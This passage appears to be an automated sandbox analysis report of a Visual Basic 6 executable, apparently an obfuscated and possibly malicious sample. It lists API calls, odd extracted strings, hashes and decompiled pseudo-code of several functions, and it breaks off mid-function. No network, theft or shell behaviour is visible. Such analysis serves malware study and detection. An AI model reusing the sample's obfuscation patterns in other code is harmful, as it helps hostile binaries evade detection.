0x00410049
0x00410056
0x0041007b
0x00410058
0x00410058
0x0041005d
0x00410062
0x00410068
0x0041006e
0x00410073
0x00410073
0x00410085
0x00410094
0x0041009e
0x004100a9
0x004100b3
0x004100be
0x004100c3
0x004100c6
0x004100cd
0x004100d4
0x004100ea
0x004100f0
0x004100f2
0x004100ff
0x00410121
0x00410101
0x00410101
0x00410106
0x0041010b
0x0041010e
0x00410114
0x00410119
0x00410119
0x00410128
0x0041012b
0x00410135
0x00410136
0x00410137
0x00410138
0x00410139
0x0041013c
0x00410149
0x0041014a
0x0041014b
0x0041014c
0x0041014d
0x0041014f
0x00410154
0x00410157
0x0041015a
0x0041015b
0x00410163
0x00410164
0x00410169
0x0041016d
0x0041016e
0x00410176
0x0041017a
0x0041017b
0x0041017d
0x00410188
0x00410190
0x00410194
0x00410195
0x00410197
0x0041019f
0x004101a6
0x004101ad
0x004101b0
0x004101ba
0x004101bb
0x004101bc
0x004101bd
0x004101be
0x004101c3
0x004101c6
0x004101cb
0x004101d2
0x004101d9
0x004101dc
0x004101e6
0x004101e7
0x004101e8
0x004101e9
0x004101ea
0x004101ef
0x004101f2
0x004101fe
0x0041021b
0x00410200
0x00410200
0x00410205
0x0041020a
0x0041020f
0x0041020f
0x0041023f
0x00410243
0x00410248
0x00410263
0x00410269
0x0041026b
0x00410278
0x0041029d
0x0041027a
0x0041027a
0x0041027f
0x00410284
0x0041028a
0x00410290
0x00410295
0x00410295
0x004102ab
0x004102af
0x004102b6
0x004102b9
0x004102c3
0x004102c4
0x004102c5
0x004102c6
0x004102c7
0x004102cc
0x004102cf
0x004102d7
0x004102dc
0x004102e0
0x004102e7
0x004102ea
0x004102f4
0x004102f5
0x004102f6
0x004102f7
0x004102f8
0x004102fd
0x00410300
0x00410305
0x0041030c
0x00410313
0x00410315
0x0041031a
0x0041031d
0x00410320
0x00410321
0x00410329
0x0041032a
0x0041032d
0x0041032e
0x00410333
0x0041033d
0x00410342
0x0041034b
0x00410351
0x00410356
0x00410357
0x0041035a
0x0041035b
0x00410360
0x00410366
0x0041036d
0x00410374
0x0041037b
0x00410382
0x00410389
0x00410390
0x00410397
0x004103a5
0x004103c2
0x004103a7
0x004103a7
0x004103ac
0x004103b1
0x004103b6
0x004103b6
0x004103e6
0x004103ea
0x004103ef
0x0041040a
0x00410410
0x00410412
0x0041041f
0x00410444
0x00410421
0x00410421
0x00410426
0x0041042b
0x00410431
0x00410437
0x0041043c
0x0041043c
0x00410471
0x00410474
0x00410476
0x00410483
0x004104a5
0x00410485
0x00410485
0x00410487
0x0041048c
0x00410492
0x00410498
0x0041049d
0x0041049d
0x004104af
0x004104b3
0x004104b4
0x004104b6
0x004104c1
0x004104c5
0x004104c9
0x004104ca
0x004104cd
0x004104ce
0x004104d0
0x004104d5
0x004104d8
0x00410521
0x00410526

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040FFB8
__vbaNew2.MSVBVM60(0040B81C,00411010,?,?,?,?,004012B6), ref: 0040FFEF
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410028
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001C4), ref: 0041006E
__vbaFreeObj.MSVBVM60(00000000,?,0040B290,000001C4), ref: 00410085
__vbaStrCat.MSVBVM60(B.L,0040B568), ref: 00410094
__vbaStrMove.MSVBVM60(B.L,0040B568), ref: 0041009E
__vbaStrCat.MSVBVM60(abe,00000000,B.L,0040B568), ref: 004100A9
__vbaStrMove.MSVBVM60(abe,00000000,B.L,0040B568), ref: 004100B3
__vbaStrCat.MSVBVM60(0040B588,00000000,abe,00000000,B.L,0040B568), ref: 004100BE
__vbaHresultCheckObj.MSVBVM60(00000000,00401288,0040AED8,00000218), ref: 00410114
__vbaChkstk.MSVBVM60(00000000,00401288,0040AED8,00000218), ref: 0041012B
__vbaChkstk.MSVBVM60(00000000,00401288,0040AED8,00000218), ref: 0041013C
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 0041015B
__vbaObjVar.MSVBVM60(00000000), ref: 00410164
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 0041016E
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,00000000), ref: 0041017D
__vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 00410188
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,00000000,00000000), ref: 00410197
__vbaChkstk.MSVBVM60 ref: 004101B0
__vbaLateMemSt.MSVBVM60(?,Caption), ref: 004101C6
__vbaChkstk.MSVBVM60(?,Caption), ref: 004101DC
__vbaLateMemSt.MSVBVM60(?,Left,?,Caption), ref: 004101F2
__vbaNew2.MSVBVM60(0040B81C,00411010,?,Left,?,Caption), ref: 0041020A
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410243
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000000E0), ref: 00410290
__vbaChkstk.MSVBVM60(00000000,?,0040B290,000000E0), ref: 004102B9
__vbaLateMemSt.MSVBVM60(?,Top), ref: 004102CF
__vbaFreeObj.MSVBVM60(?,Top), ref: 004102D7
__vbaChkstk.MSVBVM60(?,Top), ref: 004102EA
__vbaLateMemSt.MSVBVM60(?,Visible,?,Top), ref: 00410300
__vbaLateMemCallLd.MSVBVM60(00000008,?,Caption,00000000,?,Visible,?,Top), ref: 00410321
__vbaVarTstEq.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041032E
__vbaFreeVar.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041033D
#685.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00410351
__vbaObjSet.MSVBVM60(?,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041035B
__vbaNew2.MSVBVM60(0040B81C,00411010,?,00000000,?), ref: 004103B1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004103EA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000158), ref: 00410437
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B5E4,00000044), ref: 00410498
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004104B6
__vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A,00000000,?), ref: 004104D0
__vbaFreeObj.MSVBVM60(00410527,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00410521

Strings

Add, xrefs: 0041014F
Top, xrefs: 004102C7
PTyVV08DId9227, xrefs: 00410305
YciDXqpeGZ128, xrefs: 004100CD
Visible, xrefs: 004102F8
B.L, xrefs: 0041008F
Left, xrefs: 004101EA
abe, xrefs: 004100A4
Caption, xrefs: 004101BE, 00410315
C8a177, xrefs: 0041019F

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$Chkstk$Late$CheckHresult$List$New2$CallMove$#685Addref
String ID: Add$B.L$C8a177$Caption$Left$PTyVV08DId9227$Top$Visible$YciDXqpeGZ128$abe
API String ID: 2786516995-3935568613
Opcode ID: 8d86b1e061fcf05ead584b8ce94f5564632cc28d6ee36c18670aa4939a28d5b1
Instruction ID: 419e2bead07876f9291b86075999c564bc04bd3d1457e0808e19f424bc474481
Opcode Fuzzy Hash: 8d86b1e061fcf05ead584b8ce94f5564632cc28d6ee36c18670aa4939a28d5b1
Instruction Fuzzy Hash: F2E10A71900218EBDB11DF90CC45FDEBBB9BF08304F1045AAF509BB2A1DBB95A858F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F388, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040F388(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v56;
				char _v60;
				char _v76;
				char _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				intOrPtr _v144;
				intOrPtr _v152;
				intOrPtr _v160;
				intOrPtr _v168;
				char _v176;
				void* _v180;
				signed int _v184;
				intOrPtr* _v196;
				signed int _v200;
				short _t91;
				signed int _t92;
				char* _t96;
				char* _t97;
				void* _t114;
				void* _t130;
				void* _t132;
				intOrPtr _t133;

				_t133 = _t132 - 0xc;
				 *[fs:0x0] = _t133;
				L004012B0();
				_v16 = _t133;
				_v12 = 0x401210;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012b6, _t130);
				L004013E2();
				_push(0);
				_push(3);
				_push(1);
				_push(0);
				_push( &_v96);
				_push(0x10);
				_push(0x880);
				L00401394();
				_v104 = 2;
				_v112 = 2;
				L0040138E();
				_v120 = 3;
				_v128 = 2;
				_push(1);
				L0040138E();
				_v136 = 3;
				_v144 = 2;
				_push(2);
				L0040138E();
				_v152 = 4;
				_v160 = 2;
				_t114 = 3;
				L0040138E();
				_push( &_v96);
				asm("fld1");
				_push((_t114 -  *((intOrPtr*)(_v96 + 0x14)) << 4) +  *((intOrPtr*)(_v96 + 0xc)));
				 *((intOrPtr*)(_t133 + 0x1c)) = __fp0;
				_push( &_v76);
				L0040139A();
				_push( &_v96);
				_push(0);
				L00401388();
				_v168 = 2;
				_v176 = 0x8002;
				_push( &_v76);
				_t91 =  &_v176;
				_push(_t91);
				L00401436();
				_v180 = _t91;
				L00401418();
				_t92 = _v180;
				if(_t92 != 0) {
					if( *0x4112d4 != 0) {
						_v196 = 0x4112d4;
					} else {
						_push(0x4112d4);
						_push(0x40b244);
						L00401412();
						_v196 = 0x4112d4;
					}
					_v180 =  *_v196;
					_t96 =  &_v76;
					L00401376();
					L0040137C();
					_t97 =  &_v60;
					L00401382();
					_t92 =  *((intOrPtr*)( *_v180 + 0xc))(_v180, _t97, _t97, _t96, _t96, _t96,  &_v56, L"NiFrbH4CDBTOpuLSrYS1Fs6xR2fLsBFqTf78WXM122", 0);
					asm("fclex");
					_v184 = _t92;
					if(_v184 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x40b234);
						_push(_v180);
						_push(_v184);
						L0040140C();
						_v200 = _t92;
					}
					L00401406();
					L00401418();
				}
				asm("wait");
				_push(E0040F605);
				L00401418();
				L00401418();
				return _t92;
			}

0x0040f38b
0x0040f39a
0x0040f3a6
0x0040f3ae
0x0040f3b1
0x0040f3b8
0x0040f3c7
0x0040f3d0
0x0040f3d5
0x0040f3d7
0x0040f3d9
0x0040f3db
0x0040f3e0
0x0040f3e1
0x0040f3e3
0x0040f3e8
0x0040f3f0
0x0040f3f7
0x0040f414
0x0040f419
0x0040f420
0x0040f42d
0x0040f43e
0x0040f443
0x0040f44d
0x0040f460
0x0040f471
0x0040f476
0x0040f480
0x0040f495
0x0040f4a4
0x0040f4ac
0x0040f4ad
0x0040f4af
0x0040f4b0
0x0040f4b6
0x0040f4b7
0x0040f4bf
0x0040f4c0
0x0040f4c2
0x0040f4c7
0x0040f4d1
0x0040f4de
0x0040f4df
0x0040f4e5
0x0040f4e6
0x0040f4eb
0x0040f4f5
0x0040f4fa
0x0040f503
0x0040f510
0x0040f52d
0x0040f512
0x0040f512
0x0040f517
0x0040f51c
0x0040f521
0x0040f521
0x0040f53f
0x0040f550
0x0040f554
0x0040f55d
0x0040f563
0x0040f567
0x0040f57b
0x0040f57e
0x0040f580
0x0040f58d
0x0040f5af
0x0040f58f
0x0040f58f
0x0040f591
0x0040f596
0x0040f59c
0x0040f5a2
0x0040f5a7
0x0040f5a7
0x0040f5b9
0x0040f5c1
0x0040f5c1
0x0040f5c6
0x0040f5c7
0x0040f5f7
0x0040f5ff
0x0040f604

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040F3A6
__vbaVarDup.MSVBVM60(?,?,?,?,004012B6), ref: 0040F3D0
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000,?,?,?,?,004012B6), ref: 0040F3E8
__vbaVarMove.MSVBVM60 ref: 0040F414
__vbaVarMove.MSVBVM60 ref: 0040F43E
__vbaVarMove.MSVBVM60 ref: 0040F471
__vbaVarMove.MSVBVM60 ref: 0040F4A4
#665.MSVBVM60(?,?,?), ref: 0040F4B7
__vbaErase.MSVBVM60(00000000,?,?,?,?), ref: 0040F4C2
__vbaVarTstNe.MSVBVM60(00008002,?,00000000,?,?,?,?), ref: 0040F4E6
__vbaFreeVar.MSVBVM60(00008002,?,00000000,?,?,?,?), ref: 0040F4F5
__vbaNew2.MSVBVM60(0040B244,004112D4,00008002,?,00000000,?,?,?,?), ref: 0040F51C
__vbaVarLateMemCallLd.MSVBVM60(?,?,NiFrbH4CDBTOpuLSrYS1Fs6xR2fLsBFqTf78WXM122,00000000,?,?,00008002,?,00000000,?,?,?,?), ref: 0040F554
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F55D
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F567
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B234,0000000C), ref: 0040F5A2
__vbaFreeObj.MSVBVM60(00000000,?,0040B234,0000000C), ref: 0040F5B9
__vbaFreeVar.MSVBVM60(00000000,?,0040B234,0000000C), ref: 0040F5C1
__vbaFreeVar.MSVBVM60(0040F605,00008002,?,00000000,?,?,?,?), ref: 0040F5F7
__vbaFreeVar.MSVBVM60(0040F605,00008002,?,00000000,?,?,?,?), ref: 0040F5FF

Strings

NiFrbH4CDBTOpuLSrYS1Fs6xR2fLsBFqTf78WXM122, xrefs: 0040F547

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$Move$#665AddrefCallCheckChkstkEraseHresultLateNew2Redim
String ID: NiFrbH4CDBTOpuLSrYS1Fs6xR2fLsBFqTf78WXM122
API String ID: 4223332590-2767189006
Opcode ID: 162c6fb027ac7bb10ba291f0d6d262171c3491f47c0f3bbf8541254c4541c12c
Instruction ID: 4a71dc9b293b31649d46709c8fa5ecce9b98fbddbe69ef84bb74b61474886258
Opcode Fuzzy Hash: 162c6fb027ac7bb10ba291f0d6d262171c3491f47c0f3bbf8541254c4541c12c
Instruction Fuzzy Hash: BF610B71900218AFEB14EFA5C94AFDDB7B4BF04304F0081AAE505BB2E2D7789A49CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040F037, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040F037(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				void* _v44;
				char _v48;
				char _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				intOrPtr _v112;
				short _v116;
				signed int _v120;
				intOrPtr* _v132;
				signed int _v136;
				char* _t52;
				signed int _t58;
				char* _t60;
				short _t61;
				intOrPtr _t66;
				void* _t82;
				void* _t84;
				intOrPtr* _t85;

				_t85 = _t84 - 0xc;
				 *[fs:0x0] = _t85;
				L004012B0();
				_v16 = _t85;
				_v12 = 0x4011f0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4012b6, _t82);
				L004013E2();
				if( *0x411010 != 0) {
					_v132 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v132 = 0x411010;
				}
				_t66 =  *((intOrPtr*)( *_v132));
				_t52 =  &_v48;
				L00401400();
				_v116 = _t52;
				_v104 = 0x80020004;
				_v112 = 0xa;
				_v88 = 0x80020004;
				_v96 = 0xa;
				_v72 = 0x80020004;
				_v80 = 0xa;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t85 =  *0x4011e8;
				_t58 =  *((intOrPtr*)( *_v116 + 0x1cc))(_v116, _t66, 0x10, 0x10, 0x10, _t52,  *((intOrPtr*)(_t66 + 0x2fc))( *_v132));
				asm("fclex");
				_v120 = _t58;
				if(_v120 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x40b290);
					_push(_v116);
					_push(_v120);
					L0040140C();
					_v136 = _t58;
				}
				L00401406();
				_push(0xb);
				_push(0xb);
				_push(0x7db);
				_push( &_v64);
				L004013A6();
				_t60 =  &_v64;
				_push(_t60);
				L004013AC();
				_v116 =  ~(0 | _t60 != 0x0000ffff);
				L00401418();
				_t61 = _v116;
				if(_t61 != 0) {
					_push(L"OgE140");
					L004013A0();
				}
				asm("wait");
				_push(E0040F1DC);
				L00401418();
				return _t61;
			}

0x0040f03a
0x0040f049
0x0040f053
0x0040f05b
0x0040f05e
0x0040f065
0x0040f074
0x0040f07d
0x0040f089
0x0040f0a3
0x0040f08b
0x0040f08b
0x0040f090
0x0040f095
0x0040f09a
0x0040f09a
0x0040f0b4
0x0040f0be
0x0040f0c2
0x0040f0c7
0x0040f0ca
0x0040f0d1
0x0040f0d8
0x0040f0df
0x0040f0e6
0x0040f0ed
0x0040f0f7
0x0040f101
0x0040f102
0x0040f103
0x0040f104
0x0040f108
0x0040f112
0x0040f113
0x0040f114
0x0040f115
0x0040f119
0x0040f123
0x0040f124
0x0040f125
0x0040f126
0x0040f12e
0x0040f139
0x0040f13f
0x0040f141
0x0040f148
0x0040f167
0x0040f14a
0x0040f14a
0x0040f14f
0x0040f154
0x0040f157
0x0040f15a
0x0040f15f
0x0040f15f
0x0040f171
0x0040f176
0x0040f178
0x0040f17a
0x0040f182
0x0040f183
0x0040f188
0x0040f18b
0x0040f18c
0x0040f19c
0x0040f1a3
0x0040f1a8
0x0040f1ae
0x0040f1b0
0x0040f1b5
0x0040f1b5
0x0040f1ba
0x0040f1bb
0x0040f1d6
0x0040f1db

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040F053
__vbaVarDup.MSVBVM60(?,?,?,?,004012B6), ref: 0040F07D
__vbaNew2.MSVBVM60(0040B81C,00411010,?,?,?,?,004012B6), ref: 0040F095
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F0C2
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F0F7
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F108
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F119
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001CC,?,?,00000000), ref: 0040F15A
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 0040F171
#538.MSVBVM60(?,000007DB,0000000B,0000000B,?,?,00000000), ref: 0040F183
#557.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,00000000), ref: 0040F18C
__vbaFreeVar.MSVBVM60(?,?,000007DB,0000000B,0000000B,?,?,00000000), ref: 0040F1A3
#532.MSVBVM60(OgE140,?,?,000007DB,0000000B,0000000B,?,?,00000000), ref: 0040F1B5
__vbaFreeVar.MSVBVM60(0040F1DC,?,?,000007DB,0000000B,0000000B,?,?,00000000), ref: 0040F1D6

Strings

OgE140, xrefs: 0040F1B0

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Chkstk$Free$#532#538#557CheckHresultNew2
String ID: OgE140
API String ID: 670829665-1884182196
Opcode ID: abc6f35f333ef1e21fdd1bf9b96d40a7a3f11d6fa2842655a8ee5f62b1f74711
Instruction ID: c2902695f55bebf2cda8f478fb215b377816278ef0ecb874079b5cb7323fcc22
Opcode Fuzzy Hash: abc6f35f333ef1e21fdd1bf9b96d40a7a3f11d6fa2842655a8ee5f62b1f74711
Instruction Fuzzy Hash: 11414A71D00208DBDB11EFA5C845BDEBBB5BF09704F20843AF901BB2E1CBB959459B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC77, Relevance: 25.6, APIs: 17, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040EC77(void* __ebx, void* __edi, void* __esi, long long __fp0, intOrPtr* _a4, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v40;
				char _v44;
				char _v48;
				char _v64;
				char _v80;
				char _v96;
				char _v112;
				intOrPtr _v136;
				char _v144;
				char _v148;
				short _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v176;
				signed int _v180;
				signed int _v184;
				void* _t62;
				short _t75;
				char* _t79;
				signed int _t85;
				signed int _t90;
				char* _t94;
				void* _t100;
				void* _t102;
				long long* _t103;
				long long _t109;

				_t109 = __fp0;
				_t103 = _t102 - 0xc;
				 *[fs:0x0] = _t103;
				L004012B0();
				_v16 = _t103;
				_v12 = 0x4011c8;
				_v8 = 0;
				_t62 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012b6, _t100);
				L004013E2();
				_push(0x40b3e0);
				_push(0x40b3e0);
				L004013BE();
				L004013FA();
				_push(_t62);
				_push(0x40b3e0);
				_push(0);
				L004013C4();
				asm("sbb eax, eax");
				_v152 =  ~( ~( ~(_t62 - 1)));
				_t94 =  &_v44;
				L004013DC();
				if(_v152 != 0) {
					if( *0x4112d4 != 0) {
						_v176 = 0x4112d4;
					} else {
						_push(0x4112d4);
						_push(0x40b244);
						L00401412();
						_v176 = 0x4112d4;
					}
					_v152 =  *_v176;
					_t85 =  *((intOrPtr*)( *_v152 + 0x1c))(_v152,  &_v48);
					asm("fclex");
					_v156 = _t85;
					if(_v156 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40b234);
						_push(_v152);
						_push(_v156);
						L0040140C();
						_v180 = _t85;
					}
					_v160 = _v48;
					_t90 =  *((intOrPtr*)( *_v160 + 0x64))(_v160, 1,  &_v148);
					asm("fclex");
					_v164 = _t90;
					if(_v164 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40b3e4);
						_push(_v160);
						_push(_v164);
						L0040140C();
						_v184 = _t90;
					}
					_t94 =  &_v48;
					L00401406();
				}
				_push( &_v64);
				L0040143C();
				_push( &_v64);
				asm("fld1");
				_push(_t94);
				_push(_t94);
				 *_t103 = _t109;
				_push(0x40b1cc);
				_push( &_v80);
				L004013B8();
				_push( &_v96);
				L0040143C();
				_v136 = 1;
				_v144 = 2;
				_push( &_v80);
				_push( &_v96);
				_push( &_v144);
				_t75 =  &_v112;
				_push(_t75);
				L0040142A();
				_push(_t75);
				L00401436();
				_v152 = _t75;
				_push( &_v112);
				_push( &_v80);
				_push( &_v96);
				_t79 =  &_v64;
				_push(_t79);
				_push(4);
				L00401424();
				asm("wait");
				_push(E0040EEBF);
				L00401418();
				return _t79;
			}

0x0040ec77
0x0040ec7a
0x0040ec89
0x0040ec95
0x0040ec9d
0x0040eca0
0x0040eca7
0x0040ecb6
0x0040ecbf
0x0040ecc4
0x0040ecc9
0x0040ecce
0x0040ecd8
0x0040ecdd
0x0040ecde
0x0040ece3
0x0040ece5
0x0040ecf1
0x0040ecf7
0x0040ecfe
0x0040ed01
0x0040ed0f
0x0040ed1c
0x0040ed39
0x0040ed1e
0x0040ed1e
0x0040ed23
0x0040ed28
0x0040ed2d
0x0040ed2d
0x0040ed4b
0x0040ed63
0x0040ed66
0x0040ed68
0x0040ed75
0x0040ed97
0x0040ed77
0x0040ed77
0x0040ed79
0x0040ed7e
0x0040ed84
0x0040ed8a
0x0040ed8f
0x0040ed8f
0x0040eda1
0x0040edbe
0x0040edc1
0x0040edc3
0x0040edd0
0x0040edf2
0x0040edd2
0x0040edd2
0x0040edd4
0x0040edd9
0x0040eddf
0x0040ede5
0x0040edea
0x0040edea
0x0040edf9
0x0040edfc
0x0040edfc
0x0040ee04
0x0040ee05
0x0040ee0d
0x0040ee0e
0x0040ee10
0x0040ee11
0x0040ee12
0x0040ee15
0x0040ee1d
0x0040ee1e
0x0040ee26
0x0040ee27
0x0040ee2c
0x0040ee36
0x0040ee43
0x0040ee47
0x0040ee4e
0x0040ee4f
0x0040ee52
0x0040ee53
0x0040ee58
0x0040ee59
0x0040ee5e
0x0040ee68
0x0040ee6c
0x0040ee70
0x0040ee71
0x0040ee74
0x0040ee75
0x0040ee77
0x0040ee7f
0x0040ee80
0x0040eeb9
0x0040eebe

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040EC95
__vbaVarDup.MSVBVM60(?,?,?,?,004012B6), ref: 0040ECBF
__vbaStrCat.MSVBVM60(0040B3E0,0040B3E0,?,?,?,?,004012B6), ref: 0040ECCE
__vbaStrMove.MSVBVM60(0040B3E0,0040B3E0,?,?,?,?,004012B6), ref: 0040ECD8
__vbaStrComp.MSVBVM60(00000000,0040B3E0,00000000,0040B3E0,0040B3E0,?,?,?,?,004012B6), ref: 0040ECE5
__vbaFreeStr.MSVBVM60(00000000,0040B3E0,00000000,0040B3E0,0040B3E0,?,?,?,?,004012B6), ref: 0040ED01
__vbaNew2.MSVBVM60(0040B244,004112D4,00000000,0040B3E0,00000000,0040B3E0,0040B3E0,?,?,?,?,004012B6), ref: 0040ED28
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B234,0000001C), ref: 0040ED8A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B3E4,00000064), ref: 0040EDE5
__vbaFreeObj.MSVBVM60(00000000,?,0040B3E4,00000064), ref: 0040EDFC
#610.MSVBVM60(?,00000000,0040B3E0,00000000,0040B3E0,0040B3E0,?,?,?,?,004012B6), ref: 0040EE05
#661.MSVBVM60(?,0040B1CC,?,?,?,?,00000000,0040B3E0,00000000,0040B3E0,0040B3E0,?,?,?,?,004012B6), ref: 0040EE1E
#610.MSVBVM60(?,?,0040B1CC,?,?,?,?,00000000,0040B3E0,00000000,0040B3E0,0040B3E0), ref: 0040EE27
__vbaVarAdd.MSVBVM60(?,00000002,?,?), ref: 0040EE53
__vbaVarTstNe.MSVBVM60(00000000,?,00000002,?,?), ref: 0040EE59
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00000000,?,00000002,?,?), ref: 0040EE77
__vbaFreeVar.MSVBVM60(0040EEBF,?,?,?,?,004012B6), ref: 0040EEB9

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$#610CheckHresult$#661ChkstkCompListMoveNew2
String ID:
API String ID: 3230978710-0
Opcode ID: 6310cb7c5b95957cb2b037e83ce95bf3dccbcd69bc140e6bc3ce268c941cdc84
Instruction ID: 50bf5e9c40a9f47fc22203afeab6473131f1bde3963916aa995d82e1d146cb13
Opcode Fuzzy Hash: 6310cb7c5b95957cb2b037e83ce95bf3dccbcd69bc140e6bc3ce268c941cdc84
Instruction Fuzzy Hash: D9512B71D0021DAFDB10EBA1CC46FDEB7B8EF04304F0081ABE509B61A1DB785A858F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F624, Relevance: 22.7, APIs: 15, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040F624(void* __ebx, void* __edi, void* __esi, signed int __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				short _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				intOrPtr* _v128;
				short _v132;
				signed int _v136;
				signed int _v140;
				char* _t83;
				signed int _t86;
				char* _t90;
				signed int _t94;
				char* _t98;
				signed int _t105;
				char* _t107;
				intOrPtr _t118;
				void* _t127;
				void* _t129;
				intOrPtr _t130;
